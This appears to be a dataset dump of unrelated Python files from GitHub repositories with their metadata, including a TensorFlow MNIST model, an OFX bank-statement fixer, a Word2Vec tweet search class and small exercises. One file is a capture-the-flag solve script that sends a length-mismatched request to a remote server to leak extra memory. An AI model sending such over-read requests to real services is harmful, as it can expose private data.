Negative_Hist_check = Valid_Hist['Negative'] == 1
Positive_Hist = Valid_Hist[Positive_Hist_check]
Negative_Hist = Valid_Hist[Negative_Hist_check]
Moderative_Hist = Valid_Hist[ ~Positive_Hist_check & ~Negative_Hist_check]
Positive_Hist = Positive_Hist.sort_values(by='Frequency',ascending=False)
Negative_Hist = Negative_Hist.sort_values(by='Frequency',ascending=False)
Moderative_Hist = Moderative_Hist.sort_values(by='Frequency',ascending=False)
Valid_Hist.to_csv("Keyword.csv", mode='w',encoding='utf-8')
Positive_Hist.to_csv("Positive_Keyword.csv", mode='w',encoding='utf-8')
Negative_Hist.to_csv("Negative_Keyword.csv", mode='w',encoding='utf-8')
Moderative_Hist.to_csv("Moderative_Keyword.csv", mode='w',encoding='utf-8')
|
[
"noreply@github.com"
] |
seawavve.noreply@github.com
|
c3236541b8c6d111e19c617df2668068d9984f64
|
0123e2f200d3c6a383bb21625147f4e3bfafed27
|
/CNN-MNIST.py
|
1656c5f81795a51ea2e5c59b81f6f086f3012169
|
[] |
no_license
|
KingBigHandsome/Pycharm_DeepLearning
|
1aa6c7f6db681be1d06ee655a3bf9c651b58bbc6
|
70936848fdf43dc7b8f6b9913af251b5c35ab4aa
|
refs/heads/master
| 2020-03-24T12:25:11.929305
| 2018-07-28T22:42:37
| 2018-07-28T22:42:37
| 142,713,660
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,539
|
py
|
import os
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# In[2]:
mnist = input_data.read_data_sets('MNIST_data', one_hot=True)
# Parameters summaries
def variable_summaries(var):
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def weight_variable(shape, name):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial, name=name)
def bias_variable(shape, name):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial, name=name)
def conv2d(x, W):
# x input tensor of shape `[batch, in_height, in_width, in_channels]`
# W filter / kernel tensor of shape [filter_height, filter_width, in_channels, out_channels]
# padding: A `string` from: `"SAME", "VALID"`
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
# ksize [1,x,y,1]
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
with tf.name_scope('input'):
x = tf.placeholder(tf.float32, [None, 784], name='x_input')
y = tf.placeholder(tf.float32, [None, 10], name='y_input')
with tf.name_scope('x_image'):
x_image = tf.reshape(x, [-1, 28, 28, 1], name='x_image')
with tf.name_scope('Conv1'):
with tf.name_scope('W_conv1'):
W_conv1 = weight_variable([5, 5, 1, 32], name='W_conv1')
with tf.name_scope('b_conv1'):
b_conv1 = bias_variable([32], name='b_conv1')
with tf.name_scope('conv2d_1'):
conv2d_1 = conv2d(x_image, W_conv1) + b_conv1
with tf.name_scope('relu'):
h_conv1 = tf.nn.relu(conv2d_1)
with tf.name_scope('h_pool1'):
h_pool1 = max_pool_2x2(h_conv1)
with tf.name_scope('Conv2'):
with tf.name_scope('W_conv2'):
W_conv2 = weight_variable([5, 5, 32, 64], name='W_conv2')
with tf.name_scope('b_conv2'):
b_conv2 = bias_variable([64], name='b_conv2')
with tf.name_scope('conv2d_2'):
conv2d_2 = conv2d(h_pool1, W_conv2) + b_conv2
with tf.name_scope('relu'):
h_conv2 = tf.nn.relu(conv2d_2)
with tf.name_scope('h_pool2'):
h_pool2 = max_pool_2x2(h_conv2)
with tf.name_scope('fc1'):
with tf.name_scope('W_fc1'):
W_fc1 = weight_variable([7 * 7 * 64, 1024], name='W_fc1')
with tf.name_scope('b_fc1'):
b_fc1 = bias_variable([1024], name='b_fc1')
with tf.name_scope('h_pool2_flat'):
h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64], name='h_pool2_flat')
with tf.name_scope('wx_plus_b1'):
wx_plus_b1 = tf.matmul(h_pool2_flat, W_fc1) + b_fc1
with tf.name_scope('relu'):
h_fc1 = tf.nn.relu(wx_plus_b1)
with tf.name_scope('keep_prob'):
keep_prob = tf.placeholder(tf.float32, name='keep_prob')
with tf.name_scope('h_fc1_drop'):
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob, name='h_fc1_drop')
with tf.name_scope('fc2'):
with tf.name_scope('W_fc2'):
W_fc2 = weight_variable([1024, 10], name='W_fc2')
with tf.name_scope('b_fc2'):
b_fc2 = bias_variable([10], name='b_fc2')
with tf.name_scope('wx_plus_b2'):
wx_plus_b2 = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
with tf.name_scope('softmax'):
prediction = tf.nn.softmax(wx_plus_b2)
with tf.name_scope('cross_entropy'):
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=prediction),
name='cross_entropy')
tf.summary.scalar('cross_entropy', cross_entropy)
with tf.name_scope('train'):
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
correct_prediction = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
merged = tf.summary.merge_all()
batch_size = 100
n_batch = 2000
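# Train for 2000 steps; after each optimisation step, log summaries for one
# train batch and one test batch so TensorBoard can compare the two curves.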
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
train_writer = tf.summary.FileWriter('logs/train', sess.graph)
test_writer = tf.summary.FileWriter('logs/test', sess.graph)
for i in range(2000):
batch_xs, batch_ys = mnist.train.next_batch(100)
sess.run(train_step, feed_dict={x: batch_xs, y: batch_ys, keep_prob: 0.6})
summary = sess.run(merged, feed_dict={x: batch_xs, y: batch_ys, keep_prob: 1.0})
train_writer.add_summary(summary, i)
batch_xs, batch_ys = mnist.test.next_batch(100)
summary = sess.run(merged, feed_dict={x: batch_xs, y: batch_ys, keep_prob: 1.0})
test_writer.add_summary(summary, i)
if (i+1) % 100 == 0:
test_acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels, keep_prob: 1.0})
train_acc = sess.run(accuracy, feed_dict={x: mnist.train.images[:10000], y: mnist.train.labels[:10000],
keep_prob: 1.0})
print("Iter " + str(i) + ", Testing Accuracy= " + str(test_acc) + ", Training Accuracy= " + str(train_acc))
|
[
"wdshc@cau.edu.cn"
] |
wdshc@cau.edu.cn
|
c677ade5d5ab6de4167fc9d19c119cf0a810f5f5
|
33d8d8c7efc35c02fdb17f62a712a6981cc7814f
|
/PYTB1L2PlayerStatistcs.py
|
f9ae1d9986098d9d648e3bdc4dc106e72e0d0594
|
[] |
no_license
|
ryan075/PythonAchievements
|
765ca0289a1d43bc35254e9f3dc8fce0f5197c55
|
631fcf268f41118755ac39b123a287f45cf698b8
|
refs/heads/master
| 2022-12-30T18:39:53.916061
| 2020-10-21T12:33:38
| 2020-10-21T12:33:38
| 296,023,111
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,119
|
py
|
print("Vul je IGN in.")
naam = input()
print("IGN: " + " " + naam)
print("Leeftijd Character:")
age = input()
print("Dus " + naam +" is " + age)
print('Gender:')
geslacht = input()
from random import randint
speed = randint(15,20)
strength = randint(10,20)
hp = randint(150,350)
Height = randint(150,220)
import random
weapon = ['Sword', 'Spear' ,'Knife','Bow','Fist']
element = ['Fire','Water','Earth','Lightning','Wind']
playstyle = ['Defense','Offense','Passive']
Behavior = ['Sad','Mad','Happy','Scared','Disgust']
travel = ['Horse','By Feet']
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print(" ")
print('Character Info:')
print(' ')
print('Name ' + naam)
print('Gender ' + geslacht)
print('Age: ' + age)
print('Height: '+ str(Height) +'CM')
print(' ')
print(' ')
print('Game Stats:')
print('HP: ' + str(hp))
print('Element: ' + random.choice(element))
print("Weapon: ", random.choice(weapon))
print('Speed: ' + str(speed))
print('Strength: ' + str(strength))
print('PlayStyle: '+ random.choice(playstyle))
print('Emotions: '+ random.choice(Behavior))
print('Transport: '+ random.choice(travel))
|
[
"apple@MacBook-Pro.local"
] |
apple@MacBook-Pro.local
|
24fa7afed3309d21bdc6e5f02a1291371f741dac
|
4441b6cbbf0ec8b694ffddaf7d591f3a6fa12adb
|
/src/ofx_bp_fix.py
|
71a9d8b75db06552627bc8012876cc3297a4f8f7
|
[] |
no_license
|
jonathand131/OFX-bp-fix
|
75aad875ab04214d6126c0db25444d64ad9c34a5
|
8bd057c7a18aad8cb35146e22014e8c3493a7170
|
refs/heads/master
| 2021-01-20T19:56:36.732427
| 2016-06-03T11:44:36
| 2016-06-03T11:44:36
| 60,335,589
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,154
|
py
|
# coding=utf-8
"""
OFX BP Fix
Fix OFX files produced by the french bank Banque Populaire for proper import in Skrooge
"""
import os.path
import re
import sys
from ofxparse import ofxutil
from const_bp import BP_ATM, BP_CHECK, BP_COMM, BP_IXFER, BP_LOAN, BP_SEPA, BP_SUBSCRIPTION, \
BP_XFER_LONG, BP_XFER_SHORT
from const_ofx import OFX_SRVCHG, OFX_XFER, OFX_DEP, OFX_REPEATPMT, OFX_CHECK, OFX_ATM, OFX_PAYMENT, OFX_DEBIT
# Prepare regexp
RE_TYPE_IN_NAME = re.compile(
r'(?P<type>' + '|'.join((
BP_SUBSCRIPTION,
BP_XFER_SHORT,
BP_XFER_LONG,
BP_IXFER,
BP_SEPA,
BP_CHECK,
BP_ATM,
BP_COMM
)) + r')($| (?P<name>.*))')
RE_CC_CL_TRANSACTION = re.compile(r'(?P<date>\d{6}) (?P<type>CB|SC):?\*\d{9}( (?P<name>.*))?')
RE_TRANSFER_MEMO = re.compile(r'(?P<id>\d{8})($| (?P<memo>.*))')
RE_CHECK_DEPOSIT = re.compile(r'DE \s*\d* CHEQUE\(S\)')
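# Each regexp above captures one Banque Populaire statement-line layout; the
# fix_* helpers below use them to rewrite type/name/memo fields consistently.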
def fix_transaction_type_from_name(transac, stmttrnrs):
"""Fix transac type from name start"""
match_type_in_name = RE_TYPE_IN_NAME.match(transac.name.data)
if match_type_in_name:
transac.trntype.data = {
BP_SUBSCRIPTION: OFX_SRVCHG,
BP_XFER_SHORT: OFX_XFER,
BP_XFER_LONG: OFX_XFER,
BP_IXFER: OFX_DEP,
BP_SEPA: OFX_REPEATPMT,
BP_CHECK: OFX_CHECK,
BP_ATM: OFX_ATM,
BP_COMM: OFX_SRVCHG,
}.get(match_type_in_name.group('type'), transac.trntype.data)
if match_type_in_name.group('name'):
transac.name.data = match_type_in_name.group('name')
if match_type_in_name.group('type') == BP_COMM:
fix_commission(transac, stmttrnrs)
def fix_commission(transac, stmttrnrs):
"""Fix COMMISSION"""
match_cb_sc_transaction = RE_CC_CL_TRANSACTION.match(transac.memo.data)
if match_cb_sc_transaction:
transac.name.data = match_cb_sc_transaction.group('name')
transac.memo.data = match_cb_sc_transaction.group('date')
checknum = transac.checknum.data
for other_transac in stmttrnrs.stmtrs.banktranlist.stmttrn:
if other_transac.checknum.data != checknum:
continue
if other_transac.name.data.startswith(match_cb_sc_transaction.group('name')):
other_transac.name.data = match_cb_sc_transaction.group('name')
if other_transac.memo.data.startswith(match_cb_sc_transaction.group('name')):
other_transac.memo.data = match_cb_sc_transaction.group('name')
def fix_cc_cl_transaction(transac):
"""Fix credit card/contact less transactions"""
match_cb_sc_transaction = RE_CC_CL_TRANSACTION.match(transac.name.data)
if match_cb_sc_transaction:
transac.trntype.data = OFX_PAYMENT
transac.name.data = transac.memo.data
transac.memo.data = "%s %s" % (match_cb_sc_transaction.group('type'), match_cb_sc_transaction.group('date'))
def fix_transfer(transac):
"""Fix transfer"""
if transac.trntype.data == OFX_DEBIT:
match_transfer_memo = RE_TRANSFER_MEMO.match(transac.memo.data)
if match_transfer_memo:
transac.trntype.data = OFX_XFER
if match_transfer_memo.group('memo'):
transac.memo.data = "%s (%s)" % (match_transfer_memo.group('memo'),
match_transfer_memo.group('id'))
if transac.trntype.data == OFX_XFER:
transac.checknum.data = ''
def fix_atm(transac):
"""""# Fix ATM"""
if transac.trntype.data == OFX_ATM:
transac.memo.data = "%s %s" % (transac.name.data, transac.memo.data)
transac.name.data = BP_ATM
def fix_loan(transac):
"""Fix loan"""
if transac.name.data == BP_LOAN:
transac.name.data = "%s %s" % (transac.name.data, transac.checknum.data)
transac.checknum.data = ''
def fix_check_deposit(transac):
"""""# Fix check deposit"""
match_depot_cheque = RE_CHECK_DEPOSIT.match(transac.name.data)
if match_depot_cheque:
transac.trntype.data = OFX_CHECK
transac.memo = transac.name
transac.name.data = BP_CHECK
def fix_ofx(in_ofx, out_ofx):
"""
Produce a new, corrected OFX file from the given original OFX file
@param str in_ofx: OFX file to fix
@param str out_ofx: path to write corrected OFX file
"""
ofx = ofxutil.OfxUtil(in_ofx)
for stmttrnrs in ofx.bankmsgsrsv1.stmttrnrs:
for transaction in stmttrnrs.stmtrs.banktranlist.stmttrn:
fix_transaction_type_from_name(transaction, stmttrnrs)
fix_cc_cl_transaction(transaction)
fix_transfer(transaction)
fix_atm(transaction)
fix_loan(transaction)
fix_check_deposit(transaction)
ofx.write(out_ofx)
def main():
"""
Program main function
"""
if len(sys.argv) < 2:
sys.exit('Bad argument count')
input_ofx = sys.argv[1]
if len(sys.argv) > 2:
output_ofx = sys.argv[2]
else:
output_ofx = "%s_corrected%s" % os.path.splitext(input_ofx)
fix_ofx(input_ofx, output_ofx)
if __name__ == '__main__':
main()
|
[
"jonathand131@gmail.com"
] |
jonathand131@gmail.com
|
7d317a9cb596703ebfacee0371f6d82817ab2c61
|
ab347155ce07fcd1cafa43e0ac7839c6367d2312
|
/gitweb/lib/python3.6/locale.py
|
02e7a5083cd25798ff680d203f0042d96da2b861
|
[] |
no_license
|
zlynn247/zlynn247.github.io
|
b51624bbe8d6b6feca117f95b5e6659b9532844e
|
5ad5373ad15aa9ab159129bd25003f3611e42105
|
refs/heads/master
| 2021-06-17T22:24:31.517412
| 2021-01-30T20:52:54
| 2021-01-30T20:52:54
| 151,956,374
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 44
|
py
|
/home/zach/anaconda3/lib/python3.6/locale.py
|
[
"zacharyslynn@gmail.com"
] |
zacharyslynn@gmail.com
|
6f920e8d857378b555f1c47659ddb702f88f877d
|
7dfd5e6534ff9b789e66f9e3dd32df6714479d14
|
/weekly_pwnable/week1/solve.py
|
bc0eccded58e8703573f030d07723e1d8c990580
|
[] |
no_license
|
realbadbytes/ctf_dump
|
befdf2b88114d689291a054b8574b22aa3856c8b
|
693ad57710f114e535881c7118d033e309e6f8ed
|
refs/heads/master
| 2021-01-22T22:20:19.105210
| 2018-12-06T05:09:53
| 2018-12-06T05:09:53
| 85,530,655
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
#!/usr/bin/python3
from pwn import *
# r = process('/home/user/ctf_dump/weekly_pwnable/week1/xkcd')
conn = remote('167.99.10.211', 4444)
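# xkcd 1354-style over-read: the payload contains 512 "B"s but claims 528
# letters, so the echoed reply presumably leaks 16 extra bytes of server memory.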
conn.sendline('SERVER, ARE YOU STILL THERE? IF SO, REPLY "{}" ({} LETTERS)'.format("B"*512, 528))
print(conn.recvline())
|
[
"badbytes.io@gmail.com"
] |
badbytes.io@gmail.com
|
8639b09e22a762e097a17fdc88dc760c1dfef671
|
f13e64e92c03d2b1e179e798941b460089e0c6b8
|
/config.py
|
639192a585ffbe4c10eecf4f770ecca138bcd477
|
[] |
no_license
|
mohan78/pro1
|
c4ce29c2b3ae03be1c5f815cf28b0f38343430a9
|
07bf763b219c80a2d288a8d7a027b62304611b66
|
refs/heads/master
| 2023-07-08T22:20:47.156501
| 2021-08-11T04:39:02
| 2021-08-11T04:39:02
| 393,147,019
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 226
|
py
|
import os
class Config:
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL', 'postgresql://postgres:1397@localhost:5432/project1')
SQLALCHEMY_TRACK_MODIFICATIONS = False
DEBUG = os.environ.get('DEBUG', True)
|
[
"mohanroger63@gmail.com"
] |
mohanroger63@gmail.com
|
57c0c4e40f3284e6323c34b51637cd58390ac524
|
7a6b62e1744f58bf42db306f8ee0341e4105f74e
|
/coursera python basics/Michigan University/def1.py
|
b9620b51f5c7fff5cdd082427f7925820ba6411a
|
[] |
no_license
|
kiselevskaya/Python
|
cd15722992c11ecea3eb5fb8d84b2ce8f1e09189
|
c7053787e385a27dec1ae22c7b4b1f5d0362c87a
|
refs/heads/master
| 2023-06-15T19:13:34.594899
| 2021-07-15T19:57:38
| 2021-07-15T19:57:38
| 113,674,495
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
def computepay(h,r):
if h <= 40:
pay = h * r
else:
pay = 40 * r + (1.5 * r * (h - 40))
return pay
try:
hrs = raw_input("Enter Hours:")
h = float(hrs)
rate = raw_input("Enter Rate:")
r = float(rate)
except:
print 'Error, please enter numeric input'
quit()
p = computepay(h,r)
print p
|
[
"kiselevskaya.viktoriya@gmail.com"
] |
kiselevskaya.viktoriya@gmail.com
|
1da6b4bdb096618e1b81fd8e0b6526d408c2740b
|
e27333261b8e579564016c71d2061cc33972a8b8
|
/development_codes/Backend/.history/Word2Vecimplementation_20210807163821.py
|
a98c96bff762a25a2db8ea548a2cbfea6460d445
|
[] |
no_license
|
Dustyik/NewsTweet_InformationRetrieval
|
882e63dd20bc9101cbf48afa6c3302febf1989b1
|
d9a6d92b51c288f5bcd21ea1cc54772910fa58f7
|
refs/heads/master
| 2023-07-01T09:12:53.215563
| 2021-08-12T08:28:33
| 2021-08-12T08:28:33
| 382,780,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,807
|
py
|
from gensim.models.word2vec import LineSentence
from BM25implementation import BM25Class, QueryParsers
from gensim.models import Word2Vec
from sklearn.metrics.pairwise import cosine_similarity
import tempfile
import numpy as np
import pandas as pd
from BM25implementation import *
from time import time
from IPython.display import display
MIN_COUNT = 0 #min count of words when training model, default is 5
SIZE = 50 #dimensions of embedding, default 100
WORKERS = 3 #number of partitions during training, default workers is 3, used for training parallelization
WINDOW = 3 #max window size of words around it, default 5
SG = 0 #training algo, either CBOW (0) or SKIPGRAM (1), default CBOW
VECTOR_SIZE = 100 #dimensional space that Word2Vec maps the words onto, default 100
EPOCHS = 1
GENSIM_MODEL_FILEPATH = ""
class Word2VecModel:
def __init__(self, tweets_data):
self.tweets_data = tweets_data
self.corpus = self.process_corpus(tweets_data)
self.model = self.create_model(self.corpus)
#print ("In init", self.model.wv.key_to_index.keys())
def process_corpus(self, tweets_data):
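        # Gensim expects an iterable of token lists; split each cleaned tweet
        # on spaces to build that corpus.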
list_of_list = [row.split(" ") for row in tweets_data.clean_text]
return list_of_list
def create_model(self, corpus):
w2v_model = Word2Vec(
min_count = MIN_COUNT,
workers = WORKERS,
window = WINDOW,
sg = SG,
vector_size = VECTOR_SIZE)
#t = time()
w2v_model.build_vocab(corpus_iterable = corpus, progress_per=1000)
#print('Time to build vocab: {} mins'.format(round((time() - t) / 60, 2)))
#t = time()
w2v_model.train(corpus_iterable = corpus, total_examples=w2v_model.corpus_count, epochs=30, report_delay=1)
#print('Time to train the model: {} mins'.format(round((time() - t) / 60, 2)))
return w2v_model
def store_model(self):
with tempfile.NamedTemporaryFile(prefix='IR-gensim-model', delete=False) as tmp:
temporary_filepath = tmp.name
print ("Saving Model Temporary Filepath", temporary_filepath)
        self.model.save(temporary_filepath)  # save the underlying gensim model (the wrapper has no save())
def load_model(self):
loaded_model = Word2Vec.load(GENSIM_MODEL_FILEPATH)
return loaded_model
    def train_model(self):
        # Re-train on the stored corpus; gensim's train() needs the corpus,
        # example count and epochs passed explicitly on each call.
        self.model.train(corpus_iterable=self.corpus, total_examples=self.model.corpus_count, epochs=EPOCHS)
def document_embedding_w2v(self, clean_text):
i = 1
doc_tokens = list(clean_text.split(" "))
print (doc_tokens)
embeddings = []
if len(doc_tokens) < 1:
return np.zeros(VECTOR_SIZE)
else:
for tok in doc_tokens:
if tok in self.model.wv.key_to_index:
embeddings.append(self.model.wv.word_vec(tok))
else:
print ("not in vocab", tok)
i += 1
# embeddings.append(np.random.rand(VECTOR_SIZE))
# mean the vectors of individual words to get the vector of the document
return np.mean(embeddings, axis=0)
def return_most_significant_tweets(self, query):
query_vector = QueryParsers(query).query
#query_vector_embeded = self.
self.tweets_data["vector"] = self.tweets_data.apply(lambda row:(self.document_embedding_w2v(row.clean_text)), axis=1)
print (query_vector)
#self.tweets_data['similarity']=self.tweets_data['vector'].apply(lambda x: cosine_similarity(np.array(query_vector).reshape(1, -1),np.array(x).reshape(1, -1)).item())
#self.tweets_data.sort_values(by='similarity',ascending=False,inplace=True)
#return self.tweets_data
#function to tokenize query
|
[
"chiayik_tan@mymail.sutd.edu.sg"
] |
chiayik_tan@mymail.sutd.edu.sg
|
876d08fd4a0a4bd05f23c2bcaafe6b6c53e69652
|
959a200bdc6b088a21b593889bb9fe20f43a0fef
|
/sprite.py
|
7d2ee36e8c4d9f4b4d558fe69dfa1a5ba5cdcb6f
|
[] |
no_license
|
HAK-ux/Brick_Breaker
|
7ab1540a1dda85c1f012b28e85c12b702da0d784
|
311085d532496c23197ba57fc2fcd5cc9fd16a67
|
refs/heads/main
| 2023-07-24T13:04:45.232743
| 2021-09-07T07:46:53
| 2021-09-07T07:46:53
| 403,806,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 908
|
py
|
import pygame
# Class representing a sprite.
class Sprite:
def __init__(self, surface, width, height, initial_x, initial_y):
# Attributes
self.surface = surface
self.width = width
self.height = height
self.x_position = initial_x
self.y_position = initial_y
self.color = pygame.Color('white')
self.rect = pygame.Rect((self.x_position, self.y_position), (self.width, self.height))
def get_width(self):
return self.width
def get_height(self):
return self.height
def get_x_pos(self):
return self.x_position
def get_y_pos(self):
return self.y_position
def set_width(self, width):
self.width = width
def set_height(self, height):
self.height = height
def set_x_pos(self, x):
self.x_position = x
def set_y_pos(self, y):
self.y_position = y
|
[
"haiderak@students.cs.ubc.ca"
] |
haiderak@students.cs.ubc.ca
|
759bc95aab627730234d447437ce14f29bfd4235
|
12709ca90b699bd76cb6875ea2c7a32461edd9fa
|
/Blocks/EndWhileBlock.py
|
350eb759e711b459d15fc5f4145ad3054d1351b8
|
[
"Apache-2.0"
] |
permissive
|
namo-ratna-trayaya/Grail
|
07bdb7b78d7141b47e2be45e4a209d07058a4758
|
d0197d9bf8e25c125742be2517fc2f6659ef02e7
|
refs/heads/master
| 2021-06-03T19:23:12.647306
| 2016-06-12T14:27:46
| 2016-06-12T14:27:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,052
|
py
|
from Block import Block
class EndWhileBlock(Block):
'''
generates sql to end a while loop
'''
endStr=""
def getEndStr(self):
'''
returns the ending string
'''
return self.endStr
def __init__(self,stage,indent,endStr,counter):
'''
constructor: generates the sql for end while
@param stage: stage of the block
@type stage: string
@param indent: indent level
@type indent: int
@param endStr: end string
@type endStr: string
@param counter: table name thats used to decide the number of iterations
@type counter: string
'''
super(EndWhileBlock,self).__init__(stage,indent)
self.endStr=endStr
if(self.endStr=="NO_MESSAGE"):
self.append("flag := (SELECT COUNT (*) FROM " + str(counter) + ");")
else:
self.append("flag := flag - 1;")
self.append("END LOOP;",indent-1)
self.append("\nEND $$;")
self.sql=self.sb
|
[
"siddu92new@gmail.com"
] |
siddu92new@gmail.com
|
9e1ef4df64a6f45ddd5429b0f9cc48d51648c085
|
524223168cc3e4af23a3a7e46cc03086e823b838
|
/polls/views.py
|
c07366fcd4bbe6beedb5d9537a4cdb9d4236bd95
|
[] |
no_license
|
moonsng/mysite
|
ebe80708ea0f05037aa8f26a19797c868630ccfc
|
d5cd71b82a9494ac9550756d8ccb5e87394fe106
|
refs/heads/master
| 2023-06-26T10:16:40.155754
| 2021-07-26T05:36:17
| 2021-07-26T05:36:17
| 389,520,323
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return HttpResponse("HELLO")
# Create your views here.
|
[
"ericajg324@naver.com"
] |
ericajg324@naver.com
|
4ae88be2832aa4f68f902e14e397487fc2d68ae1
|
3e2607dc50fe20674f5249f58f3fbc5066e7b506
|
/0x0A-python-inheritance/3-is_kind_of_class.py
|
7533ff6d07a53c6d10973dc21d071a45f05368e7
|
[] |
no_license
|
francisco0522/holbertonschool-higher_level_programming
|
685b300e93afba51699d065e73419e95fabd37d2
|
789d737a738a150b32f3b2dc9d1b106ce423eb60
|
refs/heads/master
| 2020-09-29T04:11:27.813003
| 2020-07-20T18:52:03
| 2020-07-20T18:52:03
| 226,946,158
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 143
|
py
|
#!/usr/bin/python3
def is_kind_of_class(obj, a_class):
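    # True if obj is an instance of a_class, or of a class that inherits from it.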
if isinstance(obj, a_class):
return (True)
else:
return (False)
|
[
"pacho0522@gmail.com"
] |
pacho0522@gmail.com
|
e12dc23d3267c70efa7ccbcc57e9ed839f3a8aaf
|
940a7bbe4cb4ebf620e79beb755704e0de74e416
|
/Projekt/rozdz16/country_codes.py
|
6afb3fe01f7c8ac7588dcdcede01a99b489b377f
|
[] |
no_license
|
bbaldyga/Python
|
1cf52b22173b3096d4d6ae5bee0325805c33a58f
|
45669c8913bf403e280fba23029a992f6689c4ec
|
refs/heads/master
| 2023-05-26T05:53:23.041564
| 2021-06-10T18:14:17
| 2021-06-10T18:14:17
| 345,006,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
from pygal.maps.world import COUNTRIES
def get_country_code(country_name):
"""Return the pygam 2-digit country code form the given country"""
for code, name in COUNTRIES.items():
if name == country_name:
return code
    # If the country wasn't found, return None
return None
print(get_country_code('Andorra'))
print(get_country_code('United Arab Emirates'))
print(get_country_code('Afghanistan'))
|
[
"baldygablazej@gmail.com"
] |
baldygablazej@gmail.com
|
7cae122dd1ea97db0a34ef601b7b3f4d9e4e154e
|
9958a14eea4e016f94d3ce31223076550c94ef67
|
/carmin-server/server/resources/models/boolean_response.py
|
a8fff93110b327d7dc56d897acd0e9a503b992bb
|
[
"MIT"
] |
permissive
|
louis-ver/CARMIN
|
03af8fce7f42af0ff823a4323c72c8da9aa4e040
|
2f9036b20c723740790da17bdf84d92eb19c036e
|
refs/heads/develop
| 2021-09-09T03:34:44.570114
| 2018-03-12T21:33:02
| 2018-03-12T21:33:02
| 113,084,961
| 0
| 0
|
MIT
| 2018-03-12T21:33:03
| 2017-12-04T19:23:05
|
Python
|
UTF-8
|
Python
| false
| false
| 428
|
py
|
from marshmallow import Schema, fields, post_load
class BooleanResponse():
def __init__(self, exists: bool):
self.exists = exists
def __eq__(self, other):
return self.__dict__ == other.__dict__
class BooleanResponseSchema(Schema):
class Meta:
ordered = True
exists = fields.Boolean(required=True)
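    # marshmallow runs this hook after load(), so deserialization yields a
    # BooleanResponse instance instead of a plain dict.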
@post_load
def to_model(self, data):
return BooleanResponse(**data)
|
[
"noreply@github.com"
] |
louis-ver.noreply@github.com
|
917c2c04093058446e6e897bb65314bbfd598e5a
|
526dfe77d7c2b92e5b9e5f74c41e52d59003bc8b
|
/03ConditionalsAndControlFlow/99try.py
|
4bbc39c0ed0224df4126350b97642219d83a571a
|
[] |
no_license
|
roonitoon/training
|
b5b188b9a1ebad51968467c8a559de2724d12e64
|
b05b58b7b16b2bbe82419c2316d357f45c81faff
|
refs/heads/master
| 2022-01-20T06:55:33.591266
| 2019-04-18T09:25:38
| 2019-04-18T09:25:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 91
|
py
|
# Take a score as input, then map it to a grade: A, B, C, D, F
|
[
"adisak@intelligent-bytes.com"
] |
adisak@intelligent-bytes.com
|
2181f2fe6f75fac789710cbdac67601e469c859f
|
377dc973a58d30154cf485de141223d7ca5424dd
|
/havok_classes/hkxMaterialShaderSet.py
|
11d2777e0336631ee065cf111434eaee979b4597
|
[
"MIT"
] |
permissive
|
sawich/havok-reflection
|
d6a5552f2881bb4070ad824fb7180ad296edf4c4
|
1d5b768fb533b3eb36fc9e42793088abeffbad59
|
refs/heads/master
| 2021-10-11T12:56:44.506674
| 2019-01-25T22:37:31
| 2019-01-25T22:37:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
from .hkReferencedObject import hkReferencedObject
from typing import List
from .common import get_array
from .hkxMaterialShader import hkxMaterialShader
class hkxMaterialShaderSet(hkReferencedObject):
shaders: List[hkxMaterialShader]
def __init__(self, infile):
self.shaders = get_array(infile, hkxMaterialShader, 0) # TYPE_ARRAY:TYPE_POINTER
def __repr__(self):
return "<{class_name} shaders=[{shaders}]>".format(**{
"class_name": self.__class__.__name__,
"shaders": self.shaders,
})
|
[
"kevin@turtlerockweb.com"
] |
kevin@turtlerockweb.com
|
355025c8b812e8925a20b8f940ecb66379aac49c
|
de8eb9dcdbe58fb4f8b76c497d4cbb9020090e9c
|
/anokas_starter.py
|
